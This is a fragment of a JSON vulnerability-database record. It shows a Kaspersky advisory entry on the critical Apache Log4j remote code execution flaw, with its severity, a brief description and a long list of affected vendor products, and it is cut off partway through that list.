"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T17:34:10", "description": "### *Detect date*:\n12/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerability was found in Apache Log4j. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nApache Log4j 2.0-beta9 before 2.15.0 \n3M Health Information Systems CGS \n7Signal Sapphire \nABB Remote Service \nAPC by Schneider Electric Powerchute Business Edition \nAPC by Schneider Electric Powerchute Network Shutdown \nAPI Portal for VMware Tanzu \nAbbott GLP Track System \nAccellion Kiteworks \nAccruent Analytics \nAccruent BigCenter \nAccruent Evoco \nAccruent Expesite \nAccruent Famis 360 \nAccruent Lucernex \nAccruent Meridian \nAccruent SiteFM3 \nAccruent SiteFM4 \nAccruent Siterra \nAccruent VxMaintain/VxObserve/VxSustain \nAcronis See link \nAdobe Automated Forms Conversion Service \nAdobe ColdFusion \nAdobe Experience Manager 6.4 Forms Designer \nAdobe Experience Manager 6.5 Forms Designer \nAkamai Siem Integration Connector \nAlertus Console \nAlphatron Custo diagnostics \nAmazon AMS \nAmazon API Gateway \nAmazon AWS API Gateway \nAmazon AWS AWS Certificate Manager \nAmazon AWS AWS Service Catalog \nAmazon AWS AppFlow \nAmazon AWS AppSync \nAmazon AWS CloudHSM \nAmazon AWS CodeBuild \nAmazon AWS CodePipeline \nAmazon AWS Connect \nAmazon AWS Directory Service \nAmazon AWS DynamoDB \nAmazon AWS EKS, ECS, Fargate \nAmazon AWS ELB \nAmazon AWS ElastiCache \nAmazon AWS Glue \nAmazon AWS Greengrass \nAmazon AWS Inspector \nAmazon AWS IoT SiteWise Edge \nAmazon AWS KMS \nAmazon AWS Kinesis Data Stream \nAmazon AWS Lambda \nAmazon AWS Polly \nAmazon AWS QuickSight \nAmazon AWS RDS \nAmazon AWS S3 \nAmazon AWS SNS \nAmazon AWS SQS \nAmazon AWS Secrets Manager \nAmazon AWS Systems Manager \nAmazon AWS Textract \nAmazon Athena \nAmazon Chime \nAmazon Cloud Directory \nAmazon CloudFront \nAmazon CloudWatch \nAmazon Cognito \nAmazon Connect \nAmazon DocumentDB \nAmazon DynamoDB \nAmazon EC2 \nAmazon ECR Public \nAmazon EMR \nAmazon ElastiCache \nAmazon Elastic Load Balancing \nAmazon EventBridge \nAmazon Fraud Detector \nAmazon Inspector \nAmazon Kafka (MSK) 
\nAmazon Kendra \nAmazon Keyspaces (for Apache Cassandra) \nAmazon Kinesis \nAmazon Lake Formation \nAmazon Lex \nAmazon Linux 2 (AL2) \nAmazon Lookout for Equipment \nAmazon MQ \nAmazon Macie \nAmazon Managed Workflows for Apache Airflow (MWAA) \nAmazon MemoryDB for Redis \nAmazon Monitron \nAmazon NICE \nAmazon Neptune \nAmazon OpenSearch \nAmazon Pinpoint \nAmazon RDS \nAmazon Redshift \nAmazon Rekognition \nAmazon Route53 \nAmazon S3 \nAmazon SageMaker \nAmazon Simple Notification Service (SNS) \nAmazon Simple Queue Service (SQS) \nAmazon Simple Workflow Service (SWF) \nAmazon Single Sign-On \nAmazon Step Functions \nAmazon Timestream \nAmazon VPC \nAmazon WorkSpaces/AppStream 2.0 \nApache Archiva \nApache Camel JBang \nApache Camel Karaf \nApache Druid \nApache Dubbo \nApache Flink \nApache Fortress \nApache Geode \nApache HBase \nApache Hadoop \nApache Hive \nApache JMeter \nApache JSPWiki \nApache James \nApache Jena \nApache Kafka \nApache Karaf \nApache NiFi \nApache OFBiz \nApache Ozone \nApache SOLR \nApache SkyWalking \nApache Struts \nApache Tapestry \nApache Tika \nApache TrafficControl \nApereo CAS \nApereo Opencast \nAppDynamics with Cisco Secure Application \nAppeon PowerBuilder \nAppian Platform \nAptible \nArcserve See link \nArduino IDE \nArista Networks Analytics Node for Converged Cloud Fabric (formerly Big Cloud Fabric) \nArista Networks Analytics Node for DANZ Monitoring Fabric (formerly Big Monitoring Fabric) \nArista Networks CloudVision Portal \nArista Networks CloudVision Wi-Fi, virtual appliance or physical appliance \nArista Networks Embedded Analytics for Converged Cloud Fabric (formerly Big Cloud Fabric) \nAtlassian Bamboo Server & Data Center \nAtlassian Bitbucket Server & Data Center \nAtlassian Confluence Server & Data Center \nAtlassian Confluence-CIS CSAT Pro \nAtlassian Confluence-CIS-CAT Lite \nAtlassian Confluence-CIS-CAT Pro Assessor v3 Full and Dissolvable \nAtlassian Confluence-CIS-CAT Pro Assessor v4 \nAtlassian Crowd 
Server & Data Center \nAtlassian Crucible \nAtlassian Fisheye \nAtlassian Jira Server & Data Center \nAtos Unify First Response OpenScape Policy Store \nAtos Unify OpenScape Contact Center \nAtos Unify OpenScape Contact Media Service \nAtos Unify OpenScape Enterprise Express \nAtos Unify OpenScape UC \nAtos Unify OpenScape Voice \nAutomation Anywhere Automation 360 Cloud \nAvaya Analytics \nAvaya Aura for OneCloud Private \nAvaya Aura\u00ae Application Enablement Services \nAvaya Aura\u00ae Contact Center \nAvaya Aura\u00ae Device Services \nAvaya Aura\u00ae Media Server \nAvaya Aura\u00ae Presence Services \nAvaya Aura\u00ae Session Manager \nAvaya Aura\u00ae System Manager \nAvaya Aura\u00ae Web Gateway \nAvaya Breeze\u2122 \nAvaya Business Rules Engine \nAvaya CRM Connector - Connected Desktop \nAvaya Callback Assist \nAvaya Contact Center Select \nAvaya Control Manager \nAvaya Device Enablement Service \nAvaya Device Enrollment Service \nAvaya Equinox\u2122 Conferencing \nAvaya IP Office\u2122 Platform \nAvaya Interaction Center \nAvaya Meetings \nAvaya OneCloud-Private \nAvaya Proactive Outreach Manager \nAvaya Session Border Controller for Enterprise \nAvaya Social Media Hub \nAvaya Workforce Engagement \nAvaya one cloud private -UCaaS - Mid Market Aura \nBCT LIBER \nBCT e-Invoice \nBMC AMI Ops Insight \nBMC Bladelogic Database Automation \nBMC Helix Data Manager \nBMC Helix ITSM \nBMC Helix Platform \nBMC Remedy Smart Reporting \nBMC TrueSight Automation Console \nBackblaze Cloud \nBarco OpSpace \nBeckman Coulter Information Systems \nBeyondTrust Privilege Management Reporting in BeyondInsight \nBioJava Java library for processing biological data \nBosch Rexroth Bosch IoT gateway \nBosch Security Systems PRAESENSA PRA-APAS \nBrian Pangburn SwingSet \nBroadcom CA Risk Authentication \nBroadcom CA Strong Authentication \nBroadcom Cloud Workload Assurance (CWA) \nBroadcom Cloud Workload Protection (CWP) \nBroadcom Cloud Workload Protection for Storage (CWP:S) 
\nBroadcom Email Security Service (ESS) \nBroadcom LiveUpdate Administrator (LUA) \nBroadcom Secure Access Cloud (SAC) \nBroadcom Symantec Advanced Authentication \nBroadcom Symantec Endpoint Detection and Response (EDR) \nBroadcom Symantec Endpoint Protection Manager (SEPM) \nBroadcom Symantec Endpoint Security (SES) \nBroadcom Symantec Privileged Access Manager (PAM) \nBroadcom VIP Authentication Hub \nBroadcom Web Isolation (WI) Cloud \nBroadcom Web Security Service (WSS) Reporting \nBrocade AMPOS V2.x and V3.x \nBrocade EZSwitch \nBrocade Fabric OS \nBrocade Network Advisor \nBrocade SANnav \nCIS CAT Lite \nCIS CAT Pro Assessor v3 Full and Dissolvable \nCIS CAT Pro Assessor v4 \nCIS CSAT Pro \nCanon Rialto \nCanon Solution Health (On-Prem) \nCanon VL Alphenix Angio Workstation (AWS) \nCanon Vitrea Advanced \nCanon Vitrea Connection \nCaseWare Cloud \nCisco AppDynamics \nCisco Application Policy Infrastructure Controller (APIC) - Network Insights Base App \nCisco Automated Subsea Tuning \nCisco BroadWorks \nCisco Business Process Automation \nCisco CX Cloud \nCisco Call Studio \nCisco Cloud Connect \nCisco CloudCenter \nCisco Cloudlock \nCisco Common Services Platform Collector (CSPC) \nCisco Computer Telephony Integration Object Server (CTIOS) \nCisco Connected Mobile Experiences (CMX) \nCisco Contact Center Domain Manager (CCDM) \nCisco Contact Center Management Portal (CCMP) \nCisco Crosswork Data Gateway \nCisco Crosswork Network Controller \nCisco Crosswork Optimization Engine \nCisco Crosswork Platform Infrastructure \nCisco Crosswork Situation Manager \nCisco Crosswork Zero Touch Provisioning (ZTP) \nCisco Cyber Vision Sensor Management Extension \nCisco DNA Center \nCisco DNA Spaces \nCisco Data Center Network Manager (DCNM) \nCisco Duo \nCisco Emergency Responder \nCisco Enterprise Chat and Email \nCisco Evolved Programmable Network Manager \nCisco Finesse \nCisco Firepower Threat Defense (FTD) managed by FDM \nCisco HyperFlex System \nCisco Hyperflex 
Storage Replication Adapter \nCisco IOx Fog Director \nCisco Identity Services Engine (ISE) \nCisco Integrated Management Controller (IMC) Supervisor \nCisco Intersight Virtual Appliance \nCisco MDS 9000 Series Multilayer Switches \nCisco Network Assurance Engine \nCisco Network Services Orchestrator (NSO) \nCisco Nexus Dashboard (formerly Cisco Application Services Engine) \nCisco Nexus Insights \nCisco Nexus switches \nCisco Packaged Contact Center Enterprise \nCisco SD-WAN vManage \nCisco UCS C-Series Rack Servers \u2013 Integrated Management Controller \nCisco UCS Central Software \nCisco UCS Director \nCisco UCS Manager \nCisco Unified Communications Manager Cloud \nCisco Unified Communications Manager IM & Presence Service (formerly CUPS) \nCisco Unified Contact Center Enterprise \nCisco Unified Contact Center Express \nCisco Unified Intelligent Contact Management Enterprise \nCisco Unified SIP Proxy Software \nCisco Unity Connection \nCisco Video Surveillance Operations Manager \nCisco Virtualized Infrastructure Manager \nCisco WAN Automation Engine (WAE) \nCisco Webex Cloud-Connected UC (CCUC) \nCisco Webex Meetings Server \nCisco Workload Optimization Manager \nCisco eSIM Flex \nCitrix Endpoint Management ( XenMobile Server) \nCitrix Endpoint Management (XenMobile Server) \nCitrix Virtual Apps and Desktops (XenApp & XenDesktop) \nClavister EasyAccess \nClavister InCenter \nCloud Mobility for Dell EMC Storage \nCloudera Ambari \nCloudera Arcadia Enterprise \nCloudera CDH, HDP, and HDF \nCloudera CDP Private Cloud Base \nCloudera CDS 3 Powered by Apache Spark \nCloudera CDS 3.2 for GPUs \nCloudera Cybersecurity Platform \nCloudera Data Engineering (CDE) \nCloudera Data Flow (CFM) \nCloudera Data Science Workbench (CDSW) \nCloudera Data Steward Studio (DSS) \nCloudera Data Visualization (CDV) \nCloudera Data Warehouse (CDW) \nCloudera DataFlow (CDF) \nCloudera Edge Management (CEM) \nCloudera Enterprise \nCloudera Flow Management (CFM) \nCloudera Hortonworks 
Data Platform (HDP) \nCloudera Machine Learning (CML) \nCloudera Management Console \nCloudera Manager (Including Backup Disaster Recovery (BDR) and Replication Manager) \nCloudera Replication Manager \nCloudera Runtime (including Data Hub and all Data Hub templates) \nCloudera Stream Processing (CSP) \nCloudera Streaming Analytics (CSA) \nCloudera Workload XM \nCloudogu Ecosystem \nCode42 App \nCode42 Crashplan \nCohesity Software \nCommvault \nComputer Vision Annotation Tool maintained by Intel \nConfluent Cloud \nConfluent Connectors \nConfluent ElasticSearch Sink Connector \nConfluent Google DataProc Sink Connector \nConfluent HDFS 2 Sink Connector \nConfluent HDFS 3 Sink Connector \nConfluent Platform \nConfluent Splunk Sink Connector \nConfluent VMWare Tanzu GemFire Sink Connector \nConfluent for Kubernetes \nConnect2id server \nConnectwise Perch \nContinuous Delivery for Puppet Enterprise \nContrast Hosted SaaS Environments \nContrast On-premises (EOP) Environments \nContrast Scan \nControlUp \nCoralogix \nCouchbase ElasticSearch connector \nCyberark Identity - Secure Web Sessions (SWS) \nCyberark Privilege Cloud - Service (SaaS) \nCyberark Remote Access (Alero) - Connector \nCyberark Remote Access (Alero) - Service (SaaS) \nDDN at Scale products \nDatadog Agent \nDatadogHQ datadog-kafka-connect-logs \nDatadogHQ datadog-lambda-java \nDatev DATEV Mittelstand Faktura and DATEV Mittelstand Faktura mit Rechnungswesen compact \nDatev DATEV Wages and Salaries compact \nDatev DATEV-SmartIT \nDatev DATEVasp \nDatev Jasper Reports \nDatev Lawyer's mailbox \nDebian Apache-log4j2 \nDecos JOIN Zaak & Document (Private Cloud) \nDell APEX Console \nDell APEX Data Storage Services \nDell Cloud IQ \nDell Connectrix (Cisco MDS DCNM) \nDell EMC APEX Console \nDell EMC APEX Data Storage Services \nDell EMC AppSync \nDell EMC Atmos \nDell EMC Avamar \nDell EMC BSN Controller Node \nDell EMC Centera \nDell EMC Chassis Management Controller (CMC) \nDell EMC Cloud Disaster Recovery 
\nDell EMC CloudLink \nDell EMC Cloudboost \nDell EMC Compellent \u2013 Dell Storage Manager Client \nDell EMC Connectrix (Brocade) \nDell EMC Connectrix (Cisco MDS 9000 switches) \nDell EMC Connectrix (Cisco MDS DCNM) \nDell EMC Connectrix B-Series SANnav \nDell EMC Container Storage Modules \nDell EMC Data Computing Appliance (DCA) \nDell EMC Data Domain OS \nDell EMC Data Protection Advisor \nDell EMC Data Protection Central \nDell EMC Data Protection Search \nDell EMC DataIQ \nDell EMC Dell Hybrid Client (DHC) \nDell EMC Dell ImageAssist \nDell EMC Dell Networking X-Series \nDell EMC Dell Open Manage Mobile \nDell EMC Dell Open Manage Server Administrator \nDell EMC Dell Open Management Enterprise \u2013 Modular \nDell EMC Dell OpenManage Change Management \nDell EMC Dell OpenManage Enterprise Power Manager Plugin \nDell EMC Dell Wyse Management Suite Import Tool \nDell EMC DellEMC OpenManage Enterprise Services \nDell EMC Disk Library for Mainframe \nDell EMC ECS \nDell EMC Embedded NAS \nDell EMC Enterprise Hybrid Cloud \nDell EMC Enterprise Storage Analytics for vRealize Operations \nDell EMC Equallogic PS \nDell EMC GeoDrive \nDell EMC ISG Drive & Storage Media \nDell EMC Infinity MLK (firmware) \nDell EMC Integrated Dell Remote Access Controller (iDRAC) \nDell EMC Integrated System for Azure Stack HCI \nDell EMC Integrated System for Microsoft Azure Stack Hub \nDell EMC Isilon InsightIQ \nDell EMC IsilonSD Management Server \nDell EMC License Manager \nDell EMC Mainframe Enablers \nDell EMC Metro Node \nDell EMC MyDell Mobile \nDell EMC NetWorker \nDell EMC Networking BIOS \nDell EMC Networking N-Series \nDell EMC Networking OS9 \nDell EMC Networking Onie \nDell EMC Networking Virtual Edge Platform with VersaOS \nDell EMC OMIMSSC (OpenManage Integration for Microsoft System Center) \nDell EMC OMNIA \nDell EMC OpenManage Connections \u2013 Nagios \nDell EMC OpenManage Connections \u2013 ServiceNow \nDell EMC OpenManage Enterprise \nDell EMC OpenManage 
Integration for Microsoft System Center for System Center Operations Manager \nDell EMC OpenManage Integration for VMware vCenter \nDell EMC OpenManage Integration with Microsoft Windows Admin Center \nDell EMC OpenManage Management pack for vRealize Operations \nDell EMC OpenManage Network Integration \nDell EMC OpenManage Operations Connector for Micro Focus Operations Bridge Manager \nDell EMC OpenManage integration for Splunk \nDell EMC PPDM Search \nDell EMC PowerEdge BIOS \nDell EMC PowerEdge Operating Systems \nDell EMC PowerFlex Appliance \nDell EMC PowerFlex Manager \nDell EMC PowerFlex Rack \nDell EMC PowerFlex Software (SDS) \nDell EMC PowerMax, VMAX, VMAX3 and VMAX AFA \nDell EMC PowerPath \nDell EMC PowerProtect Cyber Recovery \nDell EMC PowerProtect DP Series Appliance (iDPA) \nDell EMC PowerProtect Data Manager \nDell EMC PowerScale OneFS \nDell EMC PowerShell for PowerMax \nDell EMC PowerShell for Powerstore \nDell EMC PowerShell for Unity \nDell EMC PowerStore \nDell EMC PowerSwitch Z9264F-ON BMC, Dell EMC PowerSwitch Z9432F-ON BMC \nDell EMC PowerVault ME4 Series Storage Arrays \nDell EMC RecoverPoint \nDell EMC Remotely Anywhere \nDell EMC Repository Manager (DRM) \nDell EMC Riptide (firmware) \nDell EMC Ruckus SmartZone 300 Controller \nDell EMC Ruckus Virtual Software \nDell EMC SRM vApp \nDell EMC SRS Policy Manager \nDell EMC SRS VE \nDell EMC Secure Connect Gateway (SCG) 5.0 Appliance \nDell EMC Secure Connect Gateway (SCG) Policy Manager \nDell EMC Server Storage \nDell EMC Smart Fabric Storage Software \nDell EMC SmartFabric Director \nDell EMC Software RAID \nDell EMC Solutions Enabler \nDell EMC Sonic \nDell EMC SourceOne \nDell EMC Storage Center OS and additional SC applications unless otherwise noted \nDell EMC Storage Center \u2013 Dell Storage Manager \nDell EMC Streaming Data Platform \nDell EMC SupportAssist Client Commercial \nDell EMC SupportAssist Client Consumer \nDell EMC SupportAssist Enterprise \nDell EMC Systems Update 
(DSU) \nDell EMC Unisphere 360 \nDell EMC Unisphere Central \nDell EMC Unisphere for PowerMax \nDell EMC Unisphere for VMAX \nDell EMC Unisphere for VNX \nDell EMC Unity \nDell EMC Update Manager Plugin \nDell EMC VNX Control Station \nDell EMC VNX2 \nDell EMC VNXe3200 \nDell EMC VPLEX \nDell EMC Vblock \nDell EMC ViPR Controller \nDell EMC Virtual Storage Integrator \nDell EMC Vsan Ready Nodes \nDell EMC VxBlock \nDell EMC VxFlex Ready Nodes \nDell EMC VxRail \nDell EMC Warnado MLK (firmware) \nDell EMC XC \nDell EMC XtremIO \nDell EMC iDRAC Service Module (iSM) \nDell EMC vRealize Data Protection Extension \nDell Open Management Enterprise - Modular \nDell OpenManage Enterprise \nDell Secure Connect Gateway (SCG) Appliance \nDell Secure Connect Gateway (SCG) Policy Manager \nDell SupportAssist Enterprise \nDell Unisphere Central \nDell VMware vRealize Automation 8.x \nDell VMware vRealize Orchestrator 8.x \nDell Vblock \nDell VxBlock \nDell Wyse Management Suite \nDell vRealize Data Protection Extension Data Management \nDell vRealize Data Protection Extension for vRealize Automation (vRA) 8.x \nDeltares Delft-FEWS \nDotCMS Hybrid Content Management System \nDynatrace ActiveGates \nDynatrace Cloud Services \nDynatrace Extensions \nDynatrace FedRamp SAAS \nDynatrace SAAS \nDynatrace Synthetic Private ActiveGate \nDynatrace Synthetic public locations \nEVL Labs JGAAP \nEaton Power Protector \nEaton Undisclosed \nEclecticIQ TIP \nElastic Logstash \nElastic search \nEllucian Banner Analytics \nEllucian Colleague \nEsri ArcGIS Data Store \nEsri ArcGIS Enterprise \nEsri ArcGIS GeoEvent Server \nEsri ArcGIS Server \nEsri ArcGIS Workflow Manager Server \nEsri Portal for ArcGIS \nEwon (HMS-Networks) eCatcher \nExtensis Universal Type Server \nExtraHop Reveal(x) \nExtreme Networks IQVA \nF-Secure Elements Connector \nF-Secure Endpoint Proxy \nF-Secure Messaging Security Gateway \nF-Secure Policy Manager \nFAST LTA Silent Brick \nFedEx Ship Manager \nFiix CMMS Core \nFiix 
CMMS core \nFileCap Server \nFortinet FortiAIOps \nFortinet FortiAnalyzer Big Data \nFortinet FortiCASB \nFortinet FortiCWP \nFortinet FortiConverter Portal \nFortinet FortiEDR Cloud \nFortinet FortiIsolator \nFortinet FortiMonitor \nFortinet FortiNAC \nFortinet FortiPolicy \nFortinet FortiPortal \nFortinet FortiSIEM \nFortinet FortiSOAR \nFortinet ShieldX \nFujitsu ETERNUS AB/HB \nFujitsu ETERNUS CS800 \nFujitsu ETERNUS DX/AF \nFujitsu ETERNUS JX \nFujitsu ETERNUS LT20/40/60 \nFujitsu ETERNUS SF \nGE Gas Power Asset Performance Management (APM) \nGE Gas Power Baseline Security Center (BSC) \nGE Gas Power Control Server \nGE Gas Power Tag Mapping Service \nGigamon Fabric Manager \nGitHub Enterprise Server \nGitHub Enterprise Cloud \nGitLab Dependency Scanning \nGitLab Gemnasium-Maven \nGitLab PMD OSS \nGitLab SAST \nGitLab Spotbugs \nGoAnywhere Gateway \nGoAnywhere MFT \nGradle Enterprise \nGraylog Forwarder \nGraylog Server \nGuardedBox \nHENIX Squash TM \nHP Teradici Cloud Access Controller \nHP Teradici EMSDK \nHP Teradici Management Console \nHP Teradici PCoIP Connection Manager \nHPE 3PAR Service Processor \nHPE 3PAR StoreServ Arrays \nHPE 3PAR StoreServ Management and Core Software Media \nHPE Aruba NetInsight Network Analytics \nHPE Authentication Server Function (AUSF) \nHPE B-series Fibre Channel Switch \nHPE B-series SAN Extension Switch \nHPE ClusterStor Data Services (CDS) \nHPE Cray EX System Monitoring Application (SMA) \nHPE Cray View for ClusterStor \nHPE Data Center Fabric Manager (DCNM) \u2013 C-Series DCNM \nHPE Data Management Framework \nHPE Device Entitlement Gateway (DEG) \nHPE Dragon \nHPE Dynamic SIM Provisioning (DSP) \nHPE Edge Infrastructure Automation \nHPE Ezmeral Container Platform \nHPE Ezmeral Data Fabric \nHPE Ezmeral Ecosystem Pack (EEP) \nHPE HP XP Command View Advanced Edition Software \u2013 HostDataCollector Component \nHPE Hyper Converged 250 System \nHPE Hyper Converged 250/380 System \nHPE Hyper Converged 380 \nHPE 
Infosight for Storage \nHPE Integrated Home Subscriber Server Software Series \nHPE Intelligent Assurance \nHPE Intelligent Management Center (IMC) Standard and Enterprise \nHPE Intelligent Management Center (iMC) \nHPE MSA \nHPE Media Workflow Master (MWM) \nHPE Network Function Virtualization Director (NFV Director) \nHPE Nimble Storage \nHPE OneView \nHPE Parallel File System Storage \nHPE Parallel Filesystem Storage (PFSS) \nHPE Primera Storage \nHPE RESTful Interface Tool (iLOREST) \nHPE Real Time Management System (RTMS) \nHPE Remote SIM Provisioning Manager (RSPM) \nHPE Revenue Intelligence Software Series \nHPE SANnav Management Software \nHPE Service Director (SD) \nHPE Shasta Monitoring Framework (SMF) \nHPE SimpliVity 2600 \nHPE SimpliVity 325 \nHPE SimpliVity 380 \nHPE SimpliVity OmniCube \nHPE Smart Storage Administrator (SSA) \nHPE StoreEasy \nHPE StoreEver CVTL \nHPE StoreEver LTO Tape Drives \nHPE StoreEver MSL Tape Libraries \nHPE StoreOnce \nHPE StoreServ Management Console (SSMC) \nHPE StoreVirtual \nHPE Telecom Analytics Smart Profile Server (TASPS) \nHPE Telecom Management Information Platform Software Series \nHPE Trueview Inventory Software Series \nHPE Unified Data Management (UDM) \nHPE Universal IoT (UioT) Platform \nHPE Unstructured Data Storage Function (UDSF) \nHPE User Data Repository (UDR) \nHPE Virtual Connect \nHPE Virtual Headend Manager (vHM) \nHPE XP Advanced Edition (HDVM) -Agent Component \nHPE XP Advanced Edition (HDVM) -Server Component \nHPE XP Command View \nHPE XP Common Services \nHPE XP Configuration Manager \nHPE XP Data Protection Manager (DPM) \nHPE XP Dynamic Link Manager (HDLM) \nHPE XP Global Link Manager (HGLM) \nHPE XP P9500 \nHPE XP Performance Advisor Software \nHPE XP Plugin \u2013 vCST (vCenter Storage Plugin), Redhat Ansible, Terraform, OLVM \nHPE XP Plugins \u2013 VASA, vROPs, SCOM, Veeam, Insight, HSPC, HRPC, HSPP, VSS, HDRE, Base Script, HBSD \nHPE XP Replication Manager (HRPM) \nHPE XP Tiered Storage 
Manager (HTSM) \nHPE XP Tuning Manager (HTNM) \nHPE XP7 \nHPE XP8 \nHPE Zerto products \nHPE enhanced Internet Usage Manager (eIUM) \nHelpsystems Clearswift Secure Email Gateway \nHelpsystems Clearswift Secure Exchange Gateway \nHelpsystems Clearswift Secure ICAP Gateway \nHelpsystems Clearswift Secure Web Gateway \nHexagon ERDAS APOLLO - Catalog Explorer \nHexagon Geoprocessing Server \nHexagon HxGN OnCall Mobile Admin \nHexagon HxGN OnCall Records \nHexagon M.App Enterprise \nHexagon M.App X - Geoprocessing Server \nHexagon inPURSUIT Server (Workflow) \nHitachi Energy Axis \nHitachi Energy FOXMAN-UN \nHitachi Energy Lumada APM On-premises \nHitachi Energy Lumada APM SaaS \nHitachi Energy Network Manager Outage Management Interface (OMI) \u2013 Third Party Oracle Database Components (Trace File Analyzer, SQL Developer, Property Graph) \nHitachi Energy Network Manager SCADA/EMS, Ranger and NMR Product \u2013 Third Party Oracle Database Components (Trace File Analyzer, SQL Developer, Property Graph) \nHitachi Energy RelCare \nHitachi Energy UNEM \nHitachi Energy e-Mesh Monitor \nHitachi Energy nMarket Global I-SEM \nHitachi Vantara Business Continuity Manager (BCM) \nHitachi Vantara CCI / RAID Manager \nHitachi Vantara Content Intelligence \nHitachi Vantara Content Platform (versions 8.2 and higher) \nHitachi Vantara Content Platform Anywhere \nHitachi Vantara Content Platform Gateway \nHitachi Vantara Content Platform S Series (all models) \nHitachi Vantara Export Tool 2 (Monitor 2) \nHitachi Vantara HCP for Cloud Scale \nHitachi Vantara HNAS 30\u00d70 Series \nHitachi Vantara HNAS 4000 Series \nHitachi Vantara HNAS 5000 Series \nHitachi Vantara Hitachi (VASA) Provider for VMware vCenter \nHitachi Vantara Hitachi 520H/X Blade (all versions) \nHitachi Vantara Hitachi 540A Blade (all versions) \nHitachi Vantara Hitachi Adaptable Modular Storage DF800S, DF800M, DF800H (AMS 2\u00d700) \nHitachi Vantara Hitachi Adapters (Bundle) for Oracle Database \nHitachi Vantara 
Hitachi Block Storage Driver (HBSD / OpenStack) \nHitachi Vantara Hitachi Compute Blade CB500, CB2000, CB2500 \nHitachi Vantara Hitachi Compute Systems Manager (HCSM) \nHitachi Vantara Hitachi Content Software for File (HCSF) \nHitachi Vantara Hitachi Data Ingestor \nHitachi Vantara Hitachi Device Manager (HDvM), HDVM Agent and HDVM Server are unaffected. \nHitachi Vantara Hitachi Disaster Recovery Solution (HDRS) \nHitachi Vantara Hitachi Dynamic Link Manager (HDLM) \nHitachi Vantara Hitachi File Services Manager (HFSM) \nHitachi Vantara Hitachi Global Link Manager (HGLM) \nHitachi Vantara Hitachi Infrastructure Analytics Advisor (HIAA) \nHitachi Vantara Hitachi Infrastructure Management Pack for VMware vRealize Operations (vROPS) \nHitachi Vantara Hitachi Ops Center Administrator (HSA) \nHitachi Vantara Hitachi Ops Center Automator (HAD) \nHitachi Vantara Hitachi Ops Center \u2013 Analyzer Viewpoint / Server / RAID Agent \nHitachi Vantara Hitachi Ops Center \u2013 Analyzer, Analyzer Probe \nHitachi Vantara Hitachi Ops Center \u2013 Common Services (HOC) \nHitachi Vantara Hitachi Ops Center \u2013 Configuration Manager REST API (HCM) \nHitachi Vantara Hitachi Ops Center \u2013 Protector \nHitachi Vantara Hitachi Remote Ops \nHitachi Vantara Hitachi Replication Manager (HRpM) \nHitachi Vantara Hitachi Replication Plugin for Containers (HRPC) \nHitachi Vantara Hitachi Storage Adapter for SAP HANA DBA Cockpit \nHitachi Vantara Hitachi Storage Adapter for VMware Site Recovery Manager (VSP SRA) \nHitachi Vantara Hitachi Storage Connector for VMware vRealize Orchestrator (vRO) \nHitachi Vantara Hitachi Storage Content Pack for VMware vRealize Log Insight (vRLI) \nHitachi Vantara Hitachi Storage Modules for Red Hat Ansible \nHitachi Vantara Hitachi Storage Plugin for Containers (HSPC) \nHitachi Vantara Hitachi Storage Plugin for Prometheus (HSPP) \nHitachi Vantara Hitachi Storage Plugin for VMware vCenter \nHitachi Vantara Hitachi Storage Replication Adapter for VMware 
Site Recovery Manager (VSP SRA) \nHitachi Vantara Hitachi Tiered Storage Manager (HTSM) \nHitachi Vantara Hitachi Tuning Manager (HTnM) \nHitachi Vantara Hitachi Unified Storage VM (HUS VM) HM700 \nHitachi Vantara Hitachi Virtual Storage Platform (VSP) RAID 700 \nHitachi Vantara Hitachi Virtual Storage Platform VSP 5200, VSP 5200H, VSP 5600, VSP 5600H \nHitachi Vantara Hitachi Virtual Storage Platform VSP E990, VSP E790, VSP E590 \nHitachi Vantara Hitachi Virtual Storage Platform VSP F/G350, VSP F/G370, VSP F/G700, VSP F/G900 \nHitachi Vantara Hitachi Virtual Storage Platform VSP G200, VSP F/G/N400, VSP F/G/N600, VSP F/G/N800 \nHitachi Vantara Infrastructure Adapter for Microsoft Windows Powershell \nHitachi Vantara Ops Center Protector Adapter for VMware Site Recovery Manager (Protector SRA) \nHitachi Vantara Ops Center Protector Connector for VMware vRealize Orchestrator (Protector vRO) \nHitachi Vantara SMU \nHitachi Vantara Storage Navigator Modular 2 (SNM2) \nHitachi Vantara UCP Advisor \nHitachi Vantara Veeam Plugin for VSP Storage \nHitachi Vantara Virtual Storage Platform Gx00/Fx00 NAS Modules \nHitachi Vantara Virtual Storage Platform Nx00 NAS Modules \nHitachi Vantara HashiCorp Terraform Provider for Hitachi Storage \nHostiFi Unifi hosting \nHuawei products \nIBM A9000/R \nIBM Block Storage \nIBM Business Automation Workflow \nIBM Cloud Backup \nIBM Cloud Object Storage \nIBM Cloud Private \nIBM Cognos Analytics \nIBM Content Delivery Network \nIBM Copy Services Manager \nIBM Curam SPM \nIBM DB2 Server \nIBM DS8000 Hardware Management Console \nIBM Elastic Storage System (ESS) \nIBM File Storage \nIBM Flash System 900 (& 840) \nIBM FlashSystem 5000 Series \nIBM FlashSystem 7000 Series \nIBM FlashSystem 9000 Series \nIBM FlashSystem v9000 \nIBM Hyper-Scale Manager (HSM) \nIBM MQ \nIBM Netezza \nIBM Power HMC \nIBM Power Hardware Management Console \nIBM PowerVM Hypervisor \nIBM PowerVM VIOS \nIBM SAN Volume Controller and Storwize Family \nIBM SPSS 
